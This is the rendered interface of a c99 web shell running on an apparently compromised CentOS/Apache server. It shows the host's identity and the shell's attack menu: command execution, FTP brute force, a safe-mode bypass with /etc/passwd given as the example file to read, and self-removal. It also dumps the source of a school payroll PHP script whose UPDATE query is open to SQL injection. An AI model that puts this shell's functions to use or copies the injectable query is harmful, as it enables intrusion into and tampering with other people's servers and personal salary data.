!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/manage_depart_bk/   drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     EditSalaryperson.php (531 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage_22222/manage_depart_bk/EditSalaryperson.php
Size 531 B
MD5 cb82df7871e30416dd7eed06db8f289c
Owner/Group root/root
Perms-rw-r--r--
Create time 06/07/2011 01:44:16
Access time 30/07/2024 13:13:56
MODIFY time 21/08/2009 09:44:00

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
3C 3F 70 68 70 0D 0A 09 69 6E 63 6C 75 64 65 28 22 2E 2E 2F 69 6E 63 6C
75 64 65 2F 46 75 6E 63 74 69 6F 6E 44 42 2E 70 68 70 22 29 3B 0D 0A 09
43 6F 6E 6E 65 63 74 44 42 28 29 3B 20 20 0D 0A 20 20 20 20 24 53 6B 69
6C 6C 20 3D 20 68 74 6D 6C 73 70 65 63 69 61 6C 63 68 61 72 73 28 74 72
69 6D 28 24 5F 50 4F 53 54 5B 53 6B 69 6C 6C 5D 29 29 3B 0D 0A 20 20 20
24 73 74 72 53 51 4C 3D 22 55 50 44 41 54 45 20 70 65 72 73 6F 6E 61 6C
5F 74 62 20 20 53 45 54 20 20 54 65 61 63 68 65 72 5F 69 64 3D 27 24 54
65 61 63 68 65 72 5F 69 64 27 2C 54 65 61 63 68 65 72 49 64 20 3D 27 24
54 65 61 63 68 65 72 49 64 27 2C 6F 66 66 69 63 65 72 49 64 31 3D 27 24
6F 66 66 69 63 65 72 49 64 31 27 2C 47 6F 76 65 72 5F 70 6F 73 3D 27 24
47 6F 76 65 72 5F 70 6F 73 27 2C 53 61 6C 61 72 79 5F 31 3D 27 24 53 61
6C 61 72 79 5F 31 27 2C 53 61 6C 61 72 79 5F 32 3D 27 24 53 61 6C 61 72
79 5F 32 27 2C 53 61 6C 61 72 79 5F 33 3D 27 24 53 61 6C 61 72 79 5F 33
27 20 20 57 48 45 52 45 20 54 65 61 63 68 65 72 5F 63 6F 64 65 3D 27 24
54 65 61 63 68 65 72 5F 63 6F 64 65 27 22 3B 0D 0A 09 24 72 65 73 75 6C
74 20 20 3D 20 6D 79 73 71 6C 5F 71 75 65 72 79 28 24 73 74 72 53 51 4C
29 20 6F 72 20 64 69 65 28 22 55 70 64 61 74 65 20 45 72 72 6F 72 20 24
73 74 72 53 51 4C 22 2E 6D 79 73 71 6C 5F 65 72 72 6F 72 28 29 29 3B 0D
0A 09 68 65 61 64 65 72 28 22 4C 6F 63 61 74 69 6F 6E 3A 50 65 72 73 6F
6E 61 6C 4D 6F 6E 79 4C 69 73 74 2E 70 68 70 3F 54 65 61 63 68 65 72 5F
63 6F 64 65 3D 24 54 65 61 63 68 65 72 5F 63 6F 64 65 22 29 3B 09 09 09
09 0D 0A 20 20 20 20 20 20 20 20 43 6C 6F 73 65 44 42 28 29 3B 0D 0A 3F
3E 0D 0A 		<?php   include("../incl
ude/FunctionDB.php");  
ConnectDB();        $Ski
ll = htmlspecialchars(tr
im($_POST[Skill]));     
$strSQL="UPDATE personal
_tb  SET  Teacher_id='$T
eacher_id',TeacherId ='$
TeacherId',officerId1='$
officerId1',Gover_pos='$
Gover_pos',Salary_1='$Sa
lary_1',Salary_2='$Salar
y_2',Salary_3='$Salary_3
'  WHERE Teacher_code='$
Teacher_code'";   $resul
t  = mysql_query($strSQL
) or die("Update Error $
strSQL".mysql_error()); 
  header("Location:Perso
nalMonyList.php?Teacher_
code=$Teacher_code");
          CloseDB();  ?
>  

HEXDUMP: [Full] [Preview]
Base64: [Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0069 ]--